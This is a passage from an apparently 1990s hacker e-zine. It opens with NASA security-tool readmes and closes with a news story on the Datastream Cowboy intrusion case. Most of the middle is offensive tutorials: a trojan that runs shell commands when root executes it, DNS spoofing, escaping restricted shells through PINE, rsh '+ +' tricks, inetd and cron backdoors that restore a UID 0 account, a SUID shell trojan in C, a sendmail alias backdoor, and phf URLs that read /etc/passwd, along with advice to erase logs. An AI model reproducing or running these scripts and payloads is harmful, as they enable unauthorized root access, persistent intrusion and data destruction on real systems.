'uudecode' aliases present in the aliases file SDM-was the 'wiz' password present in the sendmail.cf file SHADOW-was the captured password file a shadow password file. N/A used when no password file was captured. (This is the only instance where 'Yes' is a desired result) +LINE-Indicates a single '+' on a line by itself in the hosts.equiv file The second report (LARCSCAN/result/result2.db) is a list of all hosts found to have accounts with no password, followed by the unprotected account names. The ACCTS_OFF and OFF columns will be used to represent host.equiv entries that are located off-site and target hosts located off-site. Currently these entries are not valid! The last report (LARCSCAN/result/resultr1.db ) contains a list of all file systems exportable to the world. Any specific questions or problems may be sent via E-mail to j.w.park@larc.nasa.gov. (readme.naiad) The NASIRC Automated Inode Anomaly Detector (NAIAD) --------------------------------------------------- Copyright 1996 Hughes STX Corporation This software was developed by Hughes STX Corporation for the National Aeronautics and Space Administration under contract NAS5-30440. An unlimited license for use within NASA is granted. Hughes STX Corporation makes no representation concerning the suitability of this software for any particular purpose. It is provided "as is" without express or implied warranty of any kind. Author: Fred Blonder NAIAD will traverse a specified directory and all its sub-directories, looking for files meeting certain built-in criteria. If no directory is specified, it starts at the current directory. Its purpose is to find evidence of attempted or actual system tampering. The tests performed cannot easily be performed by existing system commands such as "find". NAIAD is intended to be used in conjunction with such programs and checksumming programs. The tests NAIAD performs are: * Check for file names containing unprintable characters. These are sometimes used to hide illicit programs, or the output from them. They are also frequently created by fumble-fingered users, and are not necessarily a sign of a problem. Optionally, naiad will rename the file to something easier to type on a normal keyboard. * List symbolic links, or just symbolic links to files whose name begins with a period. The exploitation of security holes in some programs involves placing symbolic links into a spool directory. NAIAD will help locate links in unexpected places. * Lists old files whose inode has been altered recently. Some malicious programs attempt to hide the fact that they have altered a file by using the "utime" system call to alter the "last modified" time of the file. The inode also contains the "inode changed" time, which is not modifiable by this call; thus a file which has been tampered to display an old modification time will still have a recent "inode changed" time. Of course, this can also be caused by someone using the "chmod" command. There are two parameters associated with this: the "window" is the amount of time within which the modification times may differ without being flagged, (default is 30 minutes, which can be changed); and "cutoff", which is the time within which the inode must have been modified for the file to have been flagged (default is to not show files whose inodes have not been modified in the last week, which can be changed). * Lists device files which are not under the /dev hierarchy, or ordinary files that are. * Lists any files or directories whose mtime, atime or ctime are later than the current system time. * Lists files which contain user-specified search-strings. This is similar to the command: find . -exec grep '{}' ';' -print but a little more efficient because there isn't a process started for each file, and naiad can be made to search only part of each file. The output format is: MMM mmm iiiiiiiiii xxxxxxxxxxxxx: "" ...where "MMM" is the major device number, "mmm" is the minor device number, "iiiiiiiii" is the inode number, "xxxxxxxxxxx" is a comment, and "" is the pathname of the file. There may be additional information appended to the line. You will probably want to run as super-user so that NAIAD can access the entire file system. It is passive, and will not alter anything it finds. More detailed information may be found in the "naiad.1" file, which is part of the naiad tarfile. ---These Are The *EXACT* Files Taken From The nasa.zip.gz I have--------------- So, looks as if NASA has some pretty neato detection juarez to use, I wouldn't advise anyone to hack any *.nasa.gov system without knowing how to obtain root and having mad skills to counter-act these security measures, you have been warned. so1o. 3. Rooting From Bin : so1o This is something I was thinking alot about the other day, I was on a System V Release 4, I had just performed the chkperm exploit, which only gives bin access (uid=1 and gid=1) to the system, so even though I own all the files in the /bin/ directory, I am still not root. Here is a very very simple technique I developed for such occasions, this may come in useful one day for someone, somewhere... Write a program that you can get people to run, you could get hold of the source for a common program, such as su or who or mount. Put this line in it somewhere: if ( !strcmp(getlogin(),"root") ) system("whatever you want"); This checks to see if the root login is running your program. If he is, you can have him execute any shell command you'd like. Here are some suggestions: "chmod 666 /etc/passwd" /etc/passwd is the system's password file. The root owns this file. Normally, everyone can read it (the passwords are encrypted) but only the root can write to it. Take a look at it and see how it's formatted if you don't know already. This command makes it possible for you to now write to the file - i.e. create unlimited accounts for yourself and your friends. "chmod 666 /etc/group" By adding yourelf to some high-access groups, you can open many doors. "chmod 666 /usr/lib/uucp/L.sys" Look for this file on your system if it is on the uucp net. It contains dialups and passwords to other systems on the net, and normally only the uucp administrator can read it. Find out who owns this file and get him to unknowingly execute a program to unlock it for you. "rm /etc/passwd" If you can get the root to execute this command, the system's passwd file will be removed and the system will go down and will not come up for some time to come. This is very destructive and evil, but pointless, if you do want to damage a system, at least use your imagination. If you are going to go about adding a trojan horse program to the system, there are some rules you should follow. If the hidden purpose is something major (such as unlocking the user's mbox or deleting all of his files or something) this program shouldn't be a program that people will be running a lot (such as a popular computer game) - once people discover that their files are public access the source of the problem will be discovered quite easily. Save this purpose for a 'test' program (such as a game you're in the process of writing) that you ask individual people to run via mail or 'chatting' with them. As I said, this 'test' program can bomb or print a phony error message after completing its task, and you will just tell the person "well, I guess it needs more work", wait until they log off, and then read whatever file of theirs that you've unlocked. If your trojan horse program's sole purpose is to catch a specific user running it - such as the root or other high-powered user - you can put the code to do so in a program that will be run a lot by various users of the system. Your modification will remain dormant until he runs it. If you cant find the source to 'star trek' or whatever in C, just learn C and convert something from pascal. It can't hurt to learn C as it's a great language. We've just seen what it can do on a UNIX system. Once you've caught the root (i.e. you can now modify the /etc/passwd file) remove the spurious code from your trojan horse program and you'll never be caught. so1o. 4. DNS Spoofing : so1o You can now use a new DNS spoofing technique originally developed by johan, I have seen this technique often applied to IRC, and prym was one of the first to use the technique for that purpose. Here is a basic introduction into the DNS concept. -------------------------------------------------- DNS stands for Domain Name Server although you may hear it refered to as Dynamic Name Server. DNS servers are used so that instead of everyone having numeric IP's for their websites and shit, they can use a DNS so that a client can 'lookup' the name (eatme.com for example) to the numeric IP. Basically, a DNS server is a computer which is running a nameserver daemon typically listening on UDP port 53. When a new domain is setup the domain is registered with Internic. Internic then tells its clients who has authority over the domains registered with it. For example say 1.2.3.4 wanted to resolve the address for peachie.com and 1.2.3.4's nameserver was 1.3.3.7. 1.2.3.4 would ask 1.3.3.7 what the numeric IP for peachie.com was, so 1.3.3.7 would ask internic who had authority over peachie.com and internic might reply with ns.peachie.com. So then 1.3.3.7 would ask ns.peachie.com what the numeric IP for peachie.com was. Then ns.peachie.com would tell 1.3.3.7 that the numeric IP for peachie.com was 4.3.2.1 and then 1.3.3.7 would then tell 1.2.3.4 the numeric IP and the name would be resolved. DNS servers generally cache addresses that are looked up by its clients. So if 1.2.3.4 were to ask 1.3.3.7 what the address for taco.com was again, 1.3.3.7 would not ask Internic etc. instead it would take the IP that it had previously resolved earlier and say that the numeric IP for peachie.com is 4.3.2.1. the funny part is that the DNS server doesn't do alot of checking when another nameserver replies to its query. It basically just tells the client what is was told at an earlier point and caches it in the same way. This is why we can spoof using such a technique, but we would need root access to a nameserver first, this is one of the biggest setbacks... How to spoof your DNS. ---------------------- Lets say were sitting on ns.peachie.com with root, and we have authority for all of peachie.com. we want to cache our boxs address 2.2.2.2 on the remote nameserver ns.eatme.org so that we can connect to eatme.org with the address of trusted.eatme.org. We could write a program that listens for DNS queries and replies with false information. sitting on ns.peachie.com we could lookup peachie.com on the nameserver ns.eatme.org. ns.eatme.org would ask Internic who had authority for peachie.com and it would reply to ns.eatme.org that ns.peachie.com had authority over peachie.com. Then ns.eatme.org would ask ns.peachie.com what the address for peachie.com was. If we were running a normal DNS then it would tell ns.eatme.org that the address for peachie.com was 4.3.2.1. but we aren't. We'll say that ns.peachie.com tells ns.eatme.org that the reverse of 2.2.2.2 is trusted.peachie.com and the address for trusted.peachie.com is 2.2.2.2. This exploits the failure to check a few things on the DNS. Basically ns.eatme.org asked what the numeric IP for peachie.com was and we told it that the reverse of 2.2.2.2 is trusted.eatme.org and that the IP of trusted.eatme.org is 2.2.2.2. They asked a question to which we responded with two awnsers to different question entirely. Now we would simply connect to eatme.org from 2.2.2.2 and eatme.org would ask ns.eatme.org for the reverse of 2.2.2.2 and in its cache it would find trusted.eatme.org and it would reply with that answer. Then it would ask for the address of trusted.eatme.org and it would reply with 2.2.2.2. you would then be connected to eatme.org from trusted.eatme.org and in effect DNS spoofing. That's all there is to it, it may be a bit heavy for some people. so1o 5. FreeNet : TrN Breaking security on restricted shells and freenets. What many system administrators fail to realize is that by setting up shells and security on their applications and systems, and generally trying to lock users in a freenet menu environment, it is almost impossible to fully examine every program. Many programs allow you to escape to shells, even in secure mode, especially the older ones. There is a longstanding bug in the gohper application, used by many freenets, that allows you to start up a gopher server, where an entry is created such as ";sh". Following this entry provides a shell. This is the main reason why the original gopher client is no longer in use. A "l;rm -rf *" was just as easy. In todays world, the biggest problem is that freenets usually allow you to edit files. If this is the case, you almost have a 100% chance of you getting into a real shell. What you first have to do is see if you can go through the menu system to edit a file. If you can't that is cool too. We are going to show you how to get a shell out of PINE. It doesn't matter which version, this works all the way up to 3.96. Anyway, like I was saying, you should see if you can either a) edit a file, or b) upload a file. I'm almost sure you can do either. So, lets start a little session here. First, you have to edit your .pinerc. If you can't, download it (or get it from the PINE package), make the changes, and reupload it. What is important is that you edit the feature-list=commands, and have it read something similar to this: feature-list=enable-alternate-editor-cmd, enable-unix-pipe-cmd After setting this correctly, go further in the file, and until you find the editor= command. It is stated that the editor is normally set to sh, and invoked via _^ [Control-Shift-Dash]. Do you get the idea yet? Set the line to read editor=sh and then save the file. Now for the fun part. Start up pine, and chose Compose Message. Erase all the To/Cc/Att/Sub headers, and make the message text blank, except for the work "sh" (without the quotes) on a single line. After this is done, press the alternate editor hotkey (^_). Here is what happens: To : Cc : Attchmnt: Subject : ----- Message Text ----- sh $ Kinda neat. That little $ is the sign that it all worked. What you probably want to do is execute some of the standard commands that tell you a little about where you are: $ uname -a ; uptime ; /sbin/ifconfig -a SunOS pb 4.1.3_U1 1 sun4m 12:14am up 47 days, 12:18, 24 users, load average: 2.71 le0: flags=63 inet 199.227.192.35 ffffff00 199.227.192.0 lo0: flags=49 inet 127.0.0.1 ff000000 Then a w ; ps -aux would be nice. It can tell you a little about what is going on, and what is safe to do the things you want. You should probably log on late at night, compile slirp if it is only a shell/vt dialin, and then check the system for vunerabilities, unshadowed passwords, etc. I've notified my freenet of their problems, but they don't seem to care. Maybe now they will. Ok sysadmins, fix up your freenets, and hackers... Hack the planet. :-) This article by TrN of The CodeZero. I'll have more interesting information on the way. You can get ahold of me at http://bluebox.dyn.ml.org:8000, or by e-mail at p033644b@pbfreenet.seflin.lib.fl.us. You should check out the web page, as it has other security related information. LaterZ. One other thing to consider, if ports 514 / 512 are open, then you can try creating an .rhosts file in your home directory containing "+ +", then use.. rsh -l loginhere systemhere.com csh -i ...and you will get a shell -- so1o 6. Backdoors Revised : Blk-Majik Disclamer: If you do anything mentioned in this article, it is your own fault and any trouble you manage to get into is your own responsibility, not mine. But what am I thinking...like any of you lamers can root a shell :). gr33tz: A big wuzzup to cf, oK, oa, and gZ! Keep it kewl, madmax, imunknown, pack, plum, mogle, crytpo`, so1o, c0d, and da rest of muh boys! Thanx to mcooly for making this document possible and helping me out! ============================================================================= section 1: ============================================================================= What is a back door? : Well, kiddies, a backdoor is just a way to remotely get into a shell without being noticed or sometimes logged. This can be done by adding a extra telnet port to the server I will show you a few ways to set up the port, and also how to keep it up even after the admin find it. so1o had a section in a back issue with a back door using the inetd.conf file where you had to end all commands with a ";". Well that annoyed the hell out of me so I have modified his technique. ============================================================================= section 2: ============================================================================= What you need : Basically, you need root on a shell to start (and a Unix based OS). After that, you will need a good editor....say pico or vi. Most of you #shells wh0res need, but lack this important ingredient....a fucking brain. ============================================================================= section 3: ============================================================================= Understanding the technique : After you checked your head, editor, whoami, etc, you are all set. Ok, this is what you look for: /etc/services This file lets you find a port /ect/inetd.conf This is where the backdoor will be ok, in the /etc/services file, you will see something like this: tcpmux 1/tcp #TCP Port Service Multiplexer tcpmux 1/udp #TCP Port Service Multiplexer compressnet 2/tcp #Management Utility compressnet 2/udp #Management Utility compressnet 3/tcp #Compression Process compressnet 3/udp #Compression Process ok, what the fuck is that? ill explain it with this example: ftp 21/tcp #File Transfer [Control] ftp 21/udp #File Transfer [Control] [1] [2]/[3] #[ 4 ] 1: The name of the service of the system. 2: The port that the system uses for the service. 3: The protocol (going to be tcp. You can chose either tcp or udp.) 4: A description of what the service is used for. Aight, thats the service file...you will need this later. now look at the /etc/inetd.conf file. the inetd is a Internet daemon that will listen for tcp requests and UDP prots and then spaws the program when a connection request is made. It will look like this: ftp stream tcp nowait root /usr/libexec/tcpd ftpd -l -A telnet stream tcp nowait root /usr/libexec/tcpd telnetd shell stream tcp nowait root /usr/libexec/tcpd rshd login stream tcp nowait root /usr/libexec/tcpd rlogind -a exec stream tcp nowait root /usr/libexec/tcpd rexecd let me explain it: ftp stream tcp nowait root /usr/libexec/tcpd ftpd -l -A [1] [ 2 ] [3] [ 4 ] [ 5 ] [ 6 ] [ 7 ] 1: Name of deamon in the services file. It tells inetd what to look for in /etc/services to see what port to use when connecting. 2: Type of of socket connection that the deamon will accept. 3: Protocol field which is always TCP or UDP. 4: How long to delay connection. 5: User to run on the deamon as (used with uid/gid permissions etc.) 6: What program will keep the connection. 7: The actual command or daemon. Ok, so what that dose it makes a port for telnet (port 21, as defined in the services file). It has a stream/tcp connection and dosn't wait for a prompt. The user is of root access and uses /ur/libexec/tcpd (but limited commands) Ok, now u know what the shit is for, next step... ============================================================================= section 4: ============================================================================= Installing the backdoor : Backdoor I : Using /etc/inetd.conf and /etc/services ---------------------------------------------------- method 1 : ---------- ok, now go back to the /etc/services file. Look at it and find a service you think the admin will not notice, and that is not in use. remember the name of the service. Now, go to the inetd.conf file. Go to a place with all the services name where the 1 is in the above example. Add you service somewhere so it is hidden within others. For 2, put the port of the service. 3 is tcp, duh. 4 is nowait. 5 will be root, so u get root access. 6 is going to be /bin/sh or what ever you like. 7 has to be 6 -i..ex: if 7 is /bin/sh, 7 is /bin/sh -i here is an example: ftp stream tcp nowait root /bin/sh sh -i Ok, now you have to restart the inetd. do this by typing (as root) : killall -HUP inetd Ok, now lets test it. From a different system... telnet victum.server.com 21 Trying 123.456.78.9... Connected to comp.com Escape character is '^]'. bash# bash# whoami root bash# tip: do NOT use the ftp port...it is just used to often. Pick a service that is not use alot. It will help you keep the backdoor running. method 2: --------- If you are willing, you can add your own service to the service file. This is easy..say you service file is like this: netbios-ssn 139/tcp nbssn imap 143/tcp # imap network mail protocol NeWS 144/tcp news # Window System snmp 161/udp ok, look at the ports.....see how they skip a few? well lets fill 1 of them up... netbios-ssn 139/tcp nbssn suled 142/tcp suled imap 143/tcp # imap network mail protocol NeWS 144/tcp news # Window System snmp 161/udp Notice the suled service...that I added that to the /etc/services. Ok, now to the /etc/inetd.conf file: ftp stream tcp nowait root /usr/sbin/tcpd in.ftpd -l -a telnet stream tcp nowait root /usr/sbin/tcpd in.telnetd gopher stream tcp nowait root /usr/sbin/tcpd gn ...Here we go!! ftp stream tcp nowait root /usr/sbin/tcpd in.ftpd -l -a telnet stream tcp nowait root /usr/sbin/tcpd in.telnetd gopher stream tcp nowait root /usr/sbin/tcpd gn suled stream tcp nowait root /bin/sh sh -i Ok, now restart inetd like i said how to before... You're all set, telnet localhost and test it!@~# Backdoor II: Da beauty of CRON ------------------------------- Ok, cron trojans are good for keeping root if the admin kills the backdoor. A Cron is a timed daemon. It consits of hours, minutes, etc. It will make the system automatically issue a command on the shell at a given time of your choice... Type crontab in the shell. It will tell you how to list, run and remove crons. You will like to look at the /var/spool/cron/crontabs/root. This is what the crons will look like: 0 0 * * 1 /usr/bin/updatedb [1] [2] [3] [4] [5] [ 6 ] 1: munute, 0-59 2: hour, 0-23 3: day of month, 1-31 4: month of yeat, 1-12 5: day of week, 0-6 6: command to execute The example above is issued on monday's. If you want to exploit the cron, simply add an cron line to the /var/spool/crontab/root. ie: If you use the UID 0 account (as seen later), you can make a cron to see if the UID 0 account is still alive. If root killed it, the cron can re-add it! ...This will make the UID 0 account, just for back-up: Cron #1 ------- newuser.sh ---------- #!/bin/sh # Inserts a UID 0 account into the middle of the passwd file. # There is likely a way to do this in 1/2 a line of AWK or SED. Oh well. # daemon9@netcom.com set linecount = `wc -l /etc/passwd` cd # Do this at home. cp /etc/passwd ./temppass # Safety first. echo passwd file has $linecount[1] lines. @ linecount[1] /= 2 @ linecount[1] += 1 # we only want 2 temp files echo Creating two files, $linecount[1] lines each \(or approximately that\). split -$linecount[1] ./temppass # passwd string optional echo "YourUser::0:0:Mr. Hacker:/home/hacker:/bin/csh" >> ./xaa cat ./xab >> ./xaa mv ./xaa /etc/passwd chmod 644 /etc/passwd # or whatever it was beforehand rm ./xa* ./temppass echo Done... *** NOTE : MODIFY THE ECHO "YOURUSER..." PART!! Here is a script that kinda does the same thing, but instead of making a new account, it will look for an old, disabled account and enable it just for you : dead.sh ------- #!/bin/sh # Everyone's favorite... cp /bin/csh /tmp/.yourlittleshell # Don't name it that... chmod 4755 /tmp/.yourlittleshell Ok, here is where the cron comes in. It will look in the passwd files to check if you YouUser is still alive. If not, it brings him back! revive.sh --------- #!/bin/sh #Is YourUser still on the system? Let's make sure he is. #daemon9@netcom.com set evilflag = (`grep eviluser /etc/passwd`) if($#evilflag == 0) then # Is he there? set linecount = `wc -l /etc/passwd` cd # Do this at home. cp /etc/passwd ./temppass # Safety first. @ linecount[1] /= 2 @ linecount[1] += 1 # we only want 2 temp files split -$linecount[1] ./temppass # passwd string option echo "YourUser::0:0:Mr. Hacker:/home/hacker:/bin/csh" >> ./xaa cat ./xab >> ./xaa mv ./xaa /etc/passwd chmod 644 /etc/passwd # or whatever it was beforehand rm ./xa* ./temppass echo Done... else endif cron #2 ------- First of all, you will need a copy of the /etc/passwd file in a hidden location. For this example, we will use /var/spool/mail/.hidepass. We have one entry in it that will be are root account we will use. Then lets make a cron that will save a copy of the real /etc/passwd file and install the hidden passwd file as the real one for 1 minute at a time of your choice. Make it at a slow time of day because any one who tries to access the passwd file durring this minute will get an error. 4:30 am is a good time. Put this in the roots cron to do this : 29 4 * * * /bin/usr/hidenhidenpass ..make sure this exist #echo "root:1234567890123:0:0:Operator:/:/bin/csh" > /var/spool/mail/.hidden here is the /bin/usr/hidenhidenpass .hidden ------- #!/bin/sh # Install trojan /etc/passwd file for one minute #daemon9@netcom.com cp /etc/passwd /etc/.temppass cp /var/spool/mail/.sneaky /etc/passwd sleep 60 mv /etc/.temppass /etc/passwd Cron #3 -------- This is a c script that will work like the above. Cron it as root like as above and just let this file load every day. hidden.c -------- #include #define KEYWORD "industry3" #define BUFFERSIZE 10 int main(argc, argv) int argc; char *argv[];{ int i=0; if(argv[1]){ /* we've got an argument, is it the keyword? */ if(!(strcmp(KEYWORD,argv[1]))){ /* This is the trojan part. */ system("cp /bin/csh /bin/.swp121"); system("chown root /bin/.swp121"); system("chmod 4755 /bin/.swp121"); } } /* Put your possibly system specific trojan messages here */ /* Let's look like we're doing something... */ printf("Sychronizing bitmap image records."); /* system("ls -alR / >& /dev/null > /dev/null&"); */ for(;i<10;i++){ fprintf(stderr,"."); sleep(1); } printf("\nDone.\n"); return(0); } /* End main */ ============================================================================= section 5: ============================================================================= Sendmail backdoor : ------------------- With this, you have to edit the /etc/aliases file. add this line: decode: |/usr/bin/uudecode make sure u hide it in their so it aint odvious :). the uudecode file will be a .rhosts file with the full pathname embedded. here is the script: uudecode.sh ----------- #!/bin/sh # Create our .rhosts file. Note this will output to stdout. echo "+ +" > tmpfile /usr/bin/uuencode tmpfile /root/.rhosts Ok, now telnet to victumserver.com at port 25. Fakemail to decode and use as the subject body, the uuencoded version of the .rhosts file. Here is an easy one (but not fake): echo "+ +" | /usr/bin/uuencode /root/.rhosts | mail decode@victimserver.com You can add any program that I have listed to be ran from the alias, so be as creative as u want! :) ============================================================================= section 6: ============================================================================= Others : Here is one of the best trojans I have seen. It is sneeky and only detectable by programs like tripwire. All you have to do is put the trojan code into a the source of some popular system programs. su, login, and passwd are very good to add it to because they run a SUID root and don't have strict permission so you can modify it. This will tell you what to do after u get the source code for the particular UNIX system you are backdooring. If you can't get the source for any programs on your system, u may be screwed :(. You can find trojaned versions of many programs, here is a small example of pseudo-code that is added in such programs... get input; if input is special hardcoded flag, spawn evil trojan; else if input is valid, continue; else quit with error; ... ============================================================================= section 7: ============================================================================= Keeping the backdoor : Well, the best advice I can possibly give to start off is to cover your tracks. If the admin doesn't know he's been hacked, he won't look for backdoors to remove. This will totaly depend on the admins ability to find backdoors and know how to get rid of them. 7. One Last Thing About The Infamous pHf Technique : so1o You can use this basic form of attack...[Thru NutScrape For Example] http://www.site.com/cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd [ 1 ][ 2 ][ 3 ][ 4 ][5][ 6 ] 1: The Target Site. 2: The pHf Command. 3: The Magic pHf Arguments. 4: The Program You Wish To Run. 5: %20 Is A Space, so %20%20%20 == 3 Spaces. 6: The Arguments You Wish To Use. Here Are Some Other Examples... ------------------------------- http://www.site.com/cgi-bin/phf?Qalias=x&0a/bin/ls%20-la%20/etc/ ...This will list the files in the /etc/ directory. http://www.site.com/cgi-bin/phf?Qalias=x%0a/bin/uname%20-a ...This will display the operating system. Remember : You execute the commands with pHf as the user nobody, so you can't shutdown the system, echo "+ +" >> /.rhosts etc. etc. All the stuff you throw at the system using phf will be logged too, so if you do decide to hack the system, remember to kill the logs when you get root :) =============================================================================== ==[ NEWS ]=====================[ .SECTION E. ]=======================[ NEWS ]== =============================================================================== 1. Some History : nobody Electronic doom will soon be visited on U.S. computer networks by information warriors, hackers, pannational groups of computer-wielding religious extremists, possible agents of Libya and Iran, international thugs and money-mad Internet savvy thieves. John Deutch, director of Central Intelligence, testified to the truth of the matter, so it must be graven in stone. In a long statement composed in the august tone of the Cold Warrior, Deutch said to the Senate Permanent Subcommittee on Investigations on June 25, "My greatest concern is that hackers, terrorist organizations, or other nations might use information warfare techniques" to disrupt the national infrastructure. The lack of solid evidence for any of the claims made by the intelligence community has created an unusual stage on which two British hackers, Datastream Cowboy and Kuji, were made the dog and pony in a ridiculous show to demonstrate the threat of information warfare to members of Congress. Because of a break-in at an Air Force facility in Rome, NY, in 1994, booth hackers were made the stars of two Government Accounting Office reports on network intrusions in the Department of Defense earlier this year. The comings and goings of Datastream Cowboy also constitute the meat of Gelber and Christy's minority staff report from the Subcommittee on Investigations. Before delving into it in detail, it's interesting to read what a British newspaper published about Datastream Cowboy, a sixteen year-old, about a year before he was made the poster boy for information warfare and international hacking conspiracies in front of Congress. In a brief article, blessedly so in contrast to the reams of propaganda published on the incident for Congress, the July 5 1995 edition of The Independent wrote, "[Datastream Cowboy] appeared before Bow Street magistrates yesterday charged with unlawfully gaining access to a series of American defense computers. Richard Pryce, who was 16 at the time of the alleged offences, is accused of accessing key US Air Force systems and a network owned by Lockheed, the missile and aircraft manufacturers." Pryce, a resident of a northwest suburb of London did not enter a plea on any of 12 charges levied against him under the British Computer Misuse Act. He was arrested on May 12, 1994, by New Scotland Yard as a result of work by the U.S. Air Force Office of Special Investigations. The Times of London reported when police came for Pryce, they found him at his PC on the third floor of his family's house. Knowing he was about to be arrested, he "curled up on the floor and cried." In Gelber and Christy's staff report, the tracking of Pryce, and to a lesser extent a collaborator called Kuji -- real name Mathew Bevan, is retold as an eight page appendix entitled "The Case Study: Rome Laboratory, Griffiss Air Force Base, NY Intrusion." Pryce's entry into Air Force computers was noticed on March 28, 1994, when personnel discovered a sniffer program he had installed on one of the Air Force systems in Rome. The Defense Information System Agency (DISA) was notified. DISA subsequently called the Air Force Office of Special Investigations (AFOSI) at the Air Force Information Warfare Center in San Antonio, Texas. AFOSI then sent a team to Rome to appraise the break-in, secure the system and trace those responsible. During the process, the AFOSI team discovered Datastream Cowboy had entered the Rome Air Force computers for the first time on March 25, according to the report. Passwords had been compromised, electronic mail read and deleted and unclassified "battlefield simulation" data copied off the facility. The Rome network was also used as a staging area for penetration of other systems on the Internet. AFOSI investigators initially traced the break-in back one step to the New York City provider, Mindvox. According to the Congressional report, this put the NYC provider under suspicion because "newspaper articles" said Mindvox's computer security was furnished by two "former Legion of Doom members." "The Legion of Doom is a loose-knit computer hacker group which had several members convicted for intrusions into corporate telephone switches in 1990 and 1991," wrote Gelber and Christy. AFOSI then got permission to begin monitoring -- the equivalent of wiretapping -- all communications on the Air Force network. Limited observation of other Internet providers being used during the break-in was conducted from the Rome facilities. Monitoring told the investigators the handles of hackers involved in the Rome break-in were Datastream Cowboy and Kuji. Since the monitoring was of limited value in determining the whereabouts of Datastream Cowboy and Kuji, AFOSI resorted to "their human intelligence network of informants, i.e., stool pigeons, that 'surf the Internet.' Gossip from one AFOSI 'Net stoolie uncovered that Datastream Cowboy was from Britain. The anonymous source said he had e-mail correspondence with Datastream Cowboy in which the hacker said he was a 16-year old living in England who enjoyed penetrating ".MIL" systems. Datastream Cowboy also apparently ran a bulletin board system and gave the telephone number to the AFOSI source. The Air Force team contacted New Scotland Yard and the British law enforcement agency identified the residence, the home of Richard Pryce, which corresponded to Datastream Cowboy's system phone number. English authorities began observing Pryce's phone calls and noticed he was making fraudulent use of British Telecom. In addition, whenever intrusions at the Air Force network in Rome occurred, Pryce's number was seen to be making illegal calls out of Britain. Pryce travelled everywhere on the Internet, going through South America, multiple countries in Europe and Mexico, occasionally entering the Rome network. From Air Force computers, he would enter systems at Jet Propulsion Laboratory in Pasadena, California, and the Goddard Space Flight Center in Greenbelt, Maryland. Since Pryce was capturing the logins and passwords of the Air Force networks in Rome, he was then able to get into the home systems of Rome network users, defense contractors like Lockheed. By mid-April of 1994 the Air Force was monitoring other systems being used by the British hackers. On the 14th of the month, Kuji logged on to the Goddard Space Center from a system in Latvia and copied data from it to the Baltic country. According to Gelber's report, the AFOSI investigators assumed the worst, that it was a sign that someone in an eastern European country was making a grab for sensitive information. They broke the connection but not before Kuji had copied files off the Goddard system. As it turned out, the Latvian computer was just another system the British hackers were using as a stepping stone; Pryce had also used it to cover his tracks when penetrating networks at Wright-Patterson Air Force Base in Ohio, via an intermediate system in Seattle, cyberspace.com. The next day, Kuji was again observed trying to probe various systems at NATO in Brussels and The Hague as well as Wright-Patterson. On the 19th, Pryce successfully returned to NATO systems in The Hague through Mindvox. The point Gelber and Christy seem to be trying to make is that Kuji, a 21-year old, was coaching Pryce during some of his attacks on various systems. By this point, New Scotland Yard had a search warrant for Pryce with the plan being to swoop down on him the next time he accessed the Air Force network in Rome. In April, Pryce penetrated a system on the Korean peninsula and copied material off a facility called the Korean Atomic Research Institute to an Air Force computer in Rome. At the time, the investigators had no idea whether the system was in North or South Korea. The impression created is one of hysteria and confusion at Rome. There was fear that the system, if in North Korea, would trigger an international incident, with the hack interpreted as an "aggressive act of war." The system turned out to be in South Korea. During the Korean break-in, New Scotland Yard could have intervened and arrested Pryce. However, for unknown reasons, the agency did not. Those with good memories may recall mainstream news reports concerning Pryce's hack, which was cast as an entry into sensitive North Korean networks. It's worth noting that while the story was portrayed as the work of an anonymous hacker, both the U.S. government and New Scotland Yard knew who the perpetrator was. Further, according to Gelber's report English authorities already had a search warrant for Pryce's house. Finally, on May 12 British authorities pounced. Pryce was arrested and his residence searched. He crumbled, according to the Times of London, and began to cry. Gelber and Christy write that Pryce promptly admitted to the Air Force break-ins as well as others. Pryce confessed he had copied a large program that used artificial intelligence to construct theoretical Air Orders of Battle from an Air Force computer to Mindvox and left it there because of its great size, 3-4 megabytes. Pryce paid for his Internet service with a fraudulent credit card number. At the time, the investigators were unable to find out the name and whereabouts of Kuji. A lead to an Australian underground bulletin board system failed to pan out. On June 23 of this year, Reuters reported that Kuji -- 21-year-old Mathew Bevan -- a computer technician, had been arrested and charged in connection with the 1994 Air Force break-ins in Rome. Rocker Tom Petty sang that even the losers get lucky some time. He wasn't thinking of British computer hackers but no better words could be used to describe the two Englishmen and a two year old chain of events that led to fame as international computer terrorists in front of Congress at the beginning of the summer of 1996. Lacking much evidence for the case of conspiratorial computer-waged campaigns of terror and chaos against the U.S., the makers of Congressional reports resorted to telling the same story over and over, three times in the space of the hearings on the subject. One envisions U.S. Congressmen too stupid or apathetic to complain, "Hey, didn't we get that yesterday, and the day before?" Pryce and Bevan appeared in "Security in Cyberspace" and twice in Government Accounting Office reports AIMD-96-84 and T-AIMD96-92. Jim Christy, the co-author of "Security in Cyberspace" and the Air Force Office of Special Investigations' source for the Pryce case supplied the same tale for Jack Brock, author of the GAO reports. Brock writes, ". . . Air Force officials told us that at least one of the hackers may have been working for a foreign country interested in obtaining military research data or areas in which the Air Force was conducting advanced research." It was, apparently, more wishful thinking. This years UK hacking conference : Access All Areas. http://www.access.org.uk July 5th. 2. [GUNNAR], MadSeason and sIn : so1o Some dudes called MadSeason and [GUNNAR] has been proving sIn's true lameness and logging it all at the same time, phear elite logging skills... ################################################################################## # # # Darkfool # # (What a Fool/The PHF hacker) # # BY [GUNNAR] # # # ################################################################################## Ever read a hacking txt by this guy? Ever realize just how useless the information his txt's are? Nothing in his txt files aren't covered in a hundred text files written before which better explain hacking techniques. Like a quote from my pal MadSeason goes: "The fact is these txt files about hacking and phreaking are written by people with minimal knowledge. Then you have some newbie who comes along wanting to be some hacker god and reads a few files and has even less of a clue then the writer had about the subject, then goes around spewing out bullshit and claiming they are a hacker and/or phreaker, just an endless circle of ignorance." That quote is so true. All these hack txt's realeased by these groups like S.I.N. and Techonophoria are just crap. About the only exploit that Darkfool knows the the PHF bug found in older versions of NCSA and Apache httpd. This bug is very well know(And over exploited might I add.). Do a search for ac.jp or edu.au domains, and adding to the address "cgi-bin/phf?Qalias=x%0a/bin/cat%20 /etc/passwd" is neither impressive nor is it even hacking. It's a lame excuse for hacking. Darkfool claims many things that he doesn't know. For instance, take pascal programming. He claims to know it, but when asked a single question on it by, Scorpion(MadSeason), he cannot answer. Here is a little something: [13:53] How many parameters do Cluster object constructors take in pascal, DF? [13:53] i have no idea scorpion [13:54] I thought you knew Pascal [13:54] i am learning it at college There is a big difference between knowing and learning. I guess Darkfool doesn't realize that. It's all a part of trying to sound and seem "elite". Which Darkfool is far from being. Seems as thought Darkfool and the rest of his S.I.N. pals are compying MadSeason and myself, and questioning 